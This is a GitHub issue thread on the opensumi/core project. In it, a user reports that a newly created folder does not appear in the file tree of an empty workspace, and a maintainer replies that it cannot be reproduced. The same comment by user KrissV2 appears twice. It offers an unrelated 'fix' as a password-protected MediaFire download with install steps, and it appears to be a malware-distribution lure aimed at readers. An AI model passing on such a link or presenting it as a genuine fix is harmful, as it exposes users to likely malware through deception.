### ISSUE TITLE
[BUG] 文件树目录显示问题

### ISSUE THREAD

**Issue by chaoyue1217** [opensumi/core#3984]
**描述你的问题（Describe the bug）**
1. 当打开的工作空间为空目录时，在文件树上直接新建文件夹后无法显示
2. 当打开的工作空间为空目录时，新建文件显示正常，新建文件后再新建文件夹显示也正常

**复现路径（To Reproduce）**
1. 新建文件夹 a：
![image](https://github.com/user-attachments/assets/f601b807-bbc6-48be-8343-a631e6fc7212)
3. 点击enter确认后的页面 
![image](https://github.com/user-attachments/assets/6a8c5fb1-0500-4ff1-99db-d9e6e90da470)
4. 刷新整个浏览器页面 
![image](https://github.com/user-attachments/assets/28476a68-20a5-4dca-9191-4f0ed6076b35)

**预期表现（Expected behavior）**

**环境信息（Environment）**

- OS:Windows10
- Browser: chrome
- OpenSumi Version:  2.26.4

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by erha19** [comment]
无法复现该问题
